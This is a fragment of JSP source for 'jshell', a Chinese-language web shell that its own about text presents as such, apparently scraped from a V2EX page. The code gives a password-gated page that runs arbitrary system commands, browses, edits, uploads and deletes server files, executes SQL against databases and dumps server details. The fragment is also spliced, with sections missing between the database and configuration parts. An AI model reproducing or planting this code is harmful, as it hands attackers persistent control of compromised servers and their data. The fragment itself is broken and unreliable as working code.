<body>
} else {
String password = null;
if (session.getAttribute("password") == null) {
password = (String)request.getParameter("password");
if (validate(password) == false) {
out.println("<div align=\"center\"><font color=\"red\"><li>密码错误!</font></div>");
out.close();
return;
}
session.setAttribute("password", password);
} else {
password = (String)session.getAttribute("password");
}
String action = null;
if (request.getParameter("action") == null)
action = "main";
else
action = (String)request.getParameter("action");
if (action.equals("exit")) {
session.removeAttribute("password");
response.sendRedirect(request.getRequestURI());
out.close();
return;
}
%>
<table align="center" width="600" border="0" cellpadding="2" cellspacing="0">
<form name="form1" method="get">
<tr bgcolor="#CCCCCC">
<td id="title"><!--[程序首页]--></td>
<td align="right">
<select name="action" onChange="javascript:changeAction(document.form1)">
<option value="main">程序首页</option>
<option value="filesystem">文件系统</option>
<option value="command">系统命令</option>
<option value="database">数据库</option>
<option value="config">程序配置</option>
<option value="about">关于程序</option>
<option value="exit">退出程序</option>
</select>
<script language="JavaScript">
<%
out.println("var action = \"" + action + "\"");
%>
var sAction = document.form1.action;
for (var i = 0; i < sAction.length; i ++) {
if (sAction[i].value == action) {
sAction[i].selected = true;
//title.innerHTML = "[" + sAction[i].innerHTML + "]";
}
}
</script>
</td>
</tr>
</form>
</table>
<%
//=====================================================================================
// end of main menu
if (action.equals("main")) {
// print the system info table
//=======================================================================================
%>
<table align="center" width="600" cellpadding="2" cellspacing="1" border="0" bgcolor="#CCCCCC">
<tr bgcolor="#FFFFFF">
<td colspan="2" align="center">服务器信息</td>
</tr>
<tr bgcolor="#FFFFFF">
<td width="300" align="center" class="datarows">服务器名</td>
<td align="center" class="datarows"><%=request.getServerName()%></td>
</tr>
<tr bgcolor="#FFFFFF">
<td width="300" align="center" class="datarows">服务器端口</td>
<td align="center" class="datarows"><%=request.getServerPort()%></td>
</tr>
<tr bgcolor="#FFFFFF">
<td width="300" align="center" class="datarows">操作系统</td>
<td align="center" class="datarows"><%=System.getProperty("os.name") + " " + System.getProperty("os.version") + " " + System.getProperty("os.arch")%></td>
</tr>
<tr bgcolor="#FFFFFF">
<td width="300" align="center" class="datarows">当前用户名</td>
<td align="center" class="datarows"><%=System.getProperty("user.name")%></td>
</tr>
<tr bgcolor="#FFFFFF">
<td width="300" align="center" class="datarows">当前用户目录</td>
<td align="center" class="datarows"><%=System.getProperty("user.home")%></td>
</tr>
<tr bgcolor="#FFFFFF">
<td width="300" align="center" class="datarows">当前用户工作目录</td>
<td align="center" class="datarows"><%=System.getProperty("user.dir")%></td>
</tr>
<tr bgcolor="#FFFFFF">
<td width="300" align="center" class="datarows">程序相对路径</td>
<td align="center" class="datarows"><%=request.getRequestURI()%></td>
</tr>
<tr bgcolor="#FFFFFF">
<td width="300" align="center" class="datarows">程序绝对路径</td>
<td align="center" class="datarows"><%=request.getRealPath(request.getServletPath())%></td>
</tr>
<tr bgcolor="#FFFFFF">
<td width="300" align="center" class="datarows">网络协议</td>
<td align="center" class="datarows"><%=request.getProtocol()%></td>
</tr>
<tr bgcolor="#FFFFFF">
<td width="300" align="center" class="datarows">服务器软件版本信息</td>
<td align="center" class="datarows"><%=application.getServerInfo()%></td>
</tr>
<tr bgcolor="#FFFFFF">
<td width="300" align="center" class="datarows">JDK 版本</td>
<td align="center" class="datarows"><%=System.getProperty("java.version")%></td>
</tr>
<tr bgcolor="#FFFFFF">
<td width="300" align="center" class="datarows">JDK 安装路径</td>
<td align="center" class="datarows"><%=System.getProperty("java.home")%></td>
</tr>
<tr bgcolor="#FFFFFF">
<td width="300" align="center" class="datarows">JAVA 虚拟机版本</td>
<td align="center" class="datarows"><%=System.getProperty("java.vm.specification.version")%></td>
</tr>
<tr bgcolor="#FFFFFF">
<td width="300" align="center" class="datarows">JAVA 虚拟机名</td>
<td align="center" class="datarows"><%=System.getProperty("java.vm.name")%></td>
</tr>
<tr bgcolor="#FFFFFF">
<td width="300" align="center" class="datarows">JAVA 类路径</td>
<td align="center" class="datarows"><%=System.getProperty("java.class.path")%></td>
</tr>
<tr bgcolor="#FFFFFF">
<td width="300" align="center" class="datarows">JAVA 载入库搜索路径</td>
<td align="center" class="datarows"><%=System.getProperty("java.library.path")%></td>
</tr>
<tr bgcolor="#FFFFFF">
<td width="300" align="center" class="datarows">JAVA 临时目录</td>
<td align="center" class="datarows"><%=System.getProperty("java.io.tmpdir")%></td>
</tr>
<tr bgcolor="#FFFFFF">
<td width="300" align="center" class="datarows">JIT 编译器名</td>
<td align="center" class="datarows"><%=System.getProperty("java.compiler") == null ? "" : System.getProperty("java.compiler")%></td>
</tr>
<tr bgcolor="#FFFFFF">
<td width="300" align="center" class="datarows">扩展目录路径</td>
<td align="center" class="datarows"><%=System.getProperty("java.ext.dirs")%></td>
</tr>
<tr bgcolor="#FFFFFF">
<td colspan="2" align="center">客户端信息</td>
</tr>
<tr bgcolor="#FFFFFF">
<td width="300" align="center" class="datarows">客户机地址</td>
<td align="center" class="datarows"><%=request.getRemoteAddr()%></td>
</tr>
<tr bgcolor="#FFFFFF">
<td width="300" align="center" class="datarows">服务机器名</td>
<td align="center" class="datarows"><%=request.getRemoteHost()%></td>
</tr>
<tr bgcolor="#FFFFFF">
<td width="300" align="center" class="datarows">用户名</td>
<td align="center" class="datarows"><%=request.getRemoteUser() == null ? "" : request.getRemoteUser()%></td>
</tr>
<tr bgcolor="#FFFFFF">
<td width="300" align="center" class="datarows">请求方式</td>
<td align="center" class="datarows"><%=request.getScheme()%></td>
</tr>
<tr bgcolor="#FFFFFF">
<td width="300" align="center" class="datarows">应用安全套接字层</td>
<td align="center" class="datarows"><%=request.isSecure() == true ? "是" : "否"%></td>
</tr>
</table>
<%
//=======================================================================================
// end of printing the system info table
/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
} else if (action.equals("filesystem")) {
String curPath = "";
String result = "";
String fsAction = "";
if (request.getParameter("curPath") == null) {
curPath = request.getRealPath(request.getServletPath());
curPath = pathConvert((new File(curPath)).getParent());
} else {
curPath = Unicode2GB((String)request.getParameter("curPath"));
}
if (request.getParameter("fsAction") == null) {
fsAction = "list";
} else {
fsAction = (String)request.getParameter("fsAction");
}
if (fsAction.equals("list"))
result = listFiles(curPath, request.getRequestURI() + "?action=" + action);
else if (fsAction.equals("browse")) {
result = listFiles(new File(curPath).getParent(), request.getRequestURI() + "?action=" + action);
result += browseFile(curPath);
}
else if (fsAction.equals("open"))
result = openFile(curPath, request.getRequestURI() + "?action=" + action);
else if (fsAction.equals("save")) {
if (request.getParameter("fileContent") == null) {
result = "<font color=\"red\">页面导航错误</font>";
} else {
String fileContent = Unicode2GB((String)request.getParameter("fileContent"));
result = saveFile(curPath, request.getRequestURI() + "?action=" + action, fileContent);
}
} else if (fsAction.equals("createFolder")) {
if (request.getParameter("folderName") == null) {
result = "<font color=\"red\">目录名不能为空</font>";
} else {
String folderName = Unicode2GB(request.getParameter("folderName").trim());
if (folderName.equals("")) {
result = "<font color=\"red\">目录名不能为空</font>";
} else {
result = createFolder(curPath, request.getRequestURI() + "?action=" + action, folderName);
}
}
} else if (fsAction.equals("createFile")) {
if (request.getParameter("fileName") == null) {
result = "<font color=\"red\">文件名不能为空</font>";
} else {
String fileName = Unicode2GB(request.getParameter("fileName").trim());
if (fileName.equals("")) {
result = "<font color=\"red\">文件名不能为空</font>";
} else {
result = createFile(curPath, request.getRequestURI() + "?action=" + action, fileName);
}
}
} else if (fsAction.equals("deleteFile")) {
if (request.getParameter("filesDelete") == null) {
result = "<font color=\"red\">没有选择要删除的文件</font>";
} else {
String[] files2Delete = (String[])request.getParameterValues("filesDelete");
if (files2Delete.length == 0) {
result = "<font color=\"red\">没有选择要删除的文件</font>";
} else {
for (int n = 0; n < files2Delete.length; n ++) {
files2Delete[n] = Unicode2GB(files2Delete[n]);
}
result = deleteFile(curPath, request.getRequestURI() + "?action=" + action, files2Delete);
}
}
} else if (fsAction.equals("saveAs")) {
if (request.getParameter("fileContent") == null) {
result = "<font color=\"red\">页面导航错误</font>";
} else {
String fileContent = Unicode2GB(request.getParameter("fileContent"));
result = saveAs(curPath, request.getRequestURI() + "?action=" + action, fileContent);
}
} else if (fsAction.equals("upload")) {
result = uploadFile(request, curPath, request.getRequestURI() + "?action=" + action);
} else if (fsAction.equals("copyto")) {
if (request.getParameter("filesDelete") == null || request.getParameter("dstPath") == null) {
result = "<font color=\"red\">没有选择要复制的文件</font>";
} else {
String[] files2Copy = request.getParameterValues("filesDelete");
String dstPath = request.getParameter("dstPath").trim();
if (files2Copy.length == 0) {
result = "<font color=\"red\">没有选择要复制的文件</font>";
} else if (dstPath.equals("")) {
result = "<font color=\"red\">没有填写要复制到的目录路径</font>";
} else {
for (int i = 0; i < files2Copy.length; i ++)
files2Copy[i] = Unicode2GB(files2Copy[i]);
result = copyFiles(curPath, request.getRequestURI() + "?action=" + action, files2Copy, Unicode2GB(dstPath));
}
}
} else if (fsAction.equals("rename")) {
if (request.getParameter("fileRename") == null) {
result = "<font color=\"red\">页面导航错误</font>";
} else {
String file2Rename = request.getParameter("fileRename").trim();
String newName = request.getParameter("newName").trim();
if (file2Rename.equals("")) {
result = "<font color=\"red\">没有选择要重命名的文件</font>";
} else if (newName.equals("")) {
result = "<font color=\"red\">没有填写新文件名</font>";
} else {
result = renameFile(curPath, request.getRequestURI() + "?action=" + action, Unicode2GB(file2Rename), Unicode2GB(newName));
}
}
}
%>
<table align="center" width="600" border="0" cellpadding="2" cellspacing="1" bgcolor="#CCCCCC">
<form method="post" name="form2" action="<%= request.getRequestURI() + "?action=" + action%>">
<tr bgcolor="#FFFFFF">
<td align="center">地址 <input type="text" size="80" name="curPath" class="textbox" value="<%=curPath%>" />
<input type="submit" value="转到" class="button" /></td>
</tr>
</form>
<tr bgcolor="#FFFFFF">
<td><%= result.trim().equals("")?" " : result%></td>
</tr>
</table>
<%
/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
} else if (action.equals("command")) {
String cmd = "";
InputStream ins = null;
String result = "";
if (request.getParameter("command") != null) {
cmd = (String)request.getParameter("command");
result = exeCmd(cmd);
}
// print the command form
//========================================================================================
%>
<table border="0" width="600" cellpadding="2" cellspacing="1" bgcolor="#CCCCCC" align="center">
<form name="form2" method="post" action="<%=request.getRequestURI() + "?action=" + action%>">
<tr bgcolor="#FFFFFF">
<td align="center">执行命令</td>
</tr>
<tr bgcolor="#FFFFFF">
<td align="center">
<input type="text" class="textbox" size="80" name="command" value="<%=cmd%>" />
<input type="submit" class="button" value="执行" />
</td>
</tr>
<tr bgcolor="#FFFFFF">
<td align="center">执行结果</td>
</tr>
</form>
</table>
<table align="center" width="600" border="0">
<tr>
<td><%=result == "" ? " " : result%></td>
</tr>
</table>
<%
//=========================================================================================
// end of printing command form
///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
} else if (action.equals("database")) {
String dbAction = "";
String result = "";
String dbType = "";
String dbServer = "";
String dbPort = "";
String dbUsername = "";
String dbPassword = "";
String dbName = "";
String dbResult = "";
String sql = "";
if (request.getParameter("dbAction") == null) {
dbAction = "main";
} else {
dbAction = request.getParameter("dbAction").trim();
if (dbAction.equals(""))
dbAction = "main";
}
if (dbAction.equals("main")) {
result = " ";
} else if (dbAction.equals("dbConnect")) {
if (request.getParameter("dbType") == null ||
request.getParameter("dbServer") == null ||
request.getParameter("dbPort") == null ||
request.getParameter("dbUsername") == null ||
request.getParameter("dbPassword") == null ||
request.getParameter("dbName") == null) {
response.sendRedirect(request.getRequestURI() + "?action=" + action);
} else {
dbType = request.getParameter("dbType").trim();
dbServer = request.getParameter("dbServer").trim();
dbPort = request.getParameter("dbPort").trim();
dbUsername = request.getParameter("dbUsername").trim();
dbPassword = request.getParameter("dbPassword").trim();
dbName = request.getParameter("dbName").trim();
if (DBInit(dbType, dbServer, dbPort, dbUsername, dbPassword, dbName)) {
if (DBConnect(dbUsername, dbPassword)) {
if (request.getParameter("sql") != null) {
sql = request.getParameter("sql").trim();
if (! sql.equals("")) {
dbResult = DBExecute(sql);
}
}
result = "<script language=\"javascript\">\n";
result += "<!--\n";
result += "function exeSql() {\n";
result += " if (ltrim(document.dbInfo.sql.value) != \"\")\n";
result += " document.dbInfo.submit();";
result += "}\n";
result += "\n";
result += "function resetIt() {\n";
result += " document.dbInfo.sql.value = \"\";";
result += "}\n";
result += "//-->\n";
result += "</script>\n";
result += "sql 语句<br/><textarea name=\"sql\" cols=\"70\" rows=\"6\">" + sql + "</textarea><br/><input type=\"submit\" class=\"button\" onclick=\"javascript:exeSql()\" value=\"执行\"/> <input type=\"reset\" class=\"button\" onclick=\"javascript:resetIt()\" value=\"清空\"/>\n";
DBRelease();
} else {
result = "<font color=\"red\">数据库连接失败</font>";
}
} else {
result = "<font color=\"red\">数据库连接驱动没有找到</font>";
}
}
}
%>
<table align="center" width="600" border="0" cellpadding="2" cellspacing="1" bgcolor="#CCCCCC">
<form name="config" method="post" action="<%=request.getRequestURI() + "?action=config&cfAction=save"%>" onSubmit="javascript:selectAllTypes()">
<tr bgcolor="#FFFFFF">
<td align="center" width="200">密码</td>
<td><input type="text" size="30" name="password" class="textbox" value="<%=_password%>" /></td>
</tr>
<tr bgcolor="#FFFFFF">
<td align="center">系统编码</td>
<td><input type="text" size="30" name="encode" value="<%=_encodeType%>" class="textbox" /></td>
</tr>
<tr bgcolor="#FFFFFF">
<td align="center">Session 超时时间</td>
<td><input type="text" size="5" name="sessionTime" class="textbox" value="<%=_sessionOutTime%>" /></td>
</tr>
<tr bgcolor="#FFFFFF">
<td align="center">可编辑文件类型</td>
<td>
<table border="0" width="190" cellpadding="0" cellspacing="0">
<tr>
<td>
<input type="text" size="11" class="textbox" name="newType" />
</td>
<td align="center">
<input type="button" onClick="javascript:delFileType()" value="<<" class="button" />
<p></p>
<input type="button" value=">>" onClick="javascript:addFileType()" class="button" />
</td>
<td align="right">
<select name="textFileTypes" size="4" style="width: 87px" multiple="true">
<%
for (i = 0; i < _textFileTypes.length; i ++) {
%>
<option value="<%=_textFileTypes[i]%>"><%=_textFileTypes[i]%></option>
<%
}
%>
</select>
</td>
</tr>
</table>
</td>
</tr>
<tr bgcolor="#FFFFFF">
<td align="center" colspan="2"><input type="submit" value="保存" class="button" /></td>
</tr>
</form>
</table>
<%
} else if (cfAction.equals("save")) {
if (request.getParameter("password") == null ||
request.getParameter("encode") == null ||
request.getParameter("sessionTime") == null ||
request.getParameterValues("textFileTypes") == null) {
response.sendRedirect(request.getRequestURI());
}
String result = "";
String newPassword = request.getParameter("password").trim();
String newEncodeType = request.getParameter("encode").trim();
String newSessionTime = request.getParameter("sessionTime").trim();
String[] newTextFileTypes = request.getParameterValues("textFileTypes");
String jshellPath = request.getRealPath(request.getServletPath());
try {
JshellConfig jconfig = new JshellConfig(jshellPath);
jconfig.setPassword(newPassword);
jconfig.setEncodeType(newEncodeType);
jconfig.setSessionTime(newSessionTime);
jconfig.setTextFileTypes(newTextFileTypes);
jconfig.save();
result += "设置保存成功,正在返回,请稍候……";
result += "<meta http-equiv=\"refresh\" content=\"2;url=" + request.getRequestURI() + "?action=" + request.getParameter("action") + "\">";
} catch (JshellConfigException e) {
result = "<font color=\"red\">" + e.getMessage() + "</font>";
}
%>
<table border="0" align="center" width="600" cellpadding="2" cellspacing="1" bgcolor="#CCCCCC">
<tr bgcolor="#FFFFFF">
<td align="center">关于 jshell ver 0.1</td>
</tr>
<tr bgcolor="#FFFFFF">
<td> Jshell 是一个简单的 jsp 的 Web Shell ,功能很简单。这个程序是我这几天上课空闲时间里没是干写着玩的,慢慢的也有了点雏形,就拿出来希望对你有点用处。程序本身很乱,可读性不好,不过还是欢迎有兴趣的朋友和我交流。</td>
</tr>
<tr bgcolor="#FFFFFF">
<td align="right">created by <a href="mailto:luoluonet@hotmail.com">luoluo</a> and welcome to <a href="http://www.ph4nt0m.org" target="_blank">幻影旅团</a></td>
</tr>
</table>
</body>
</html>
这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。
V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。
V2EX is a community of developers, designers and creative people.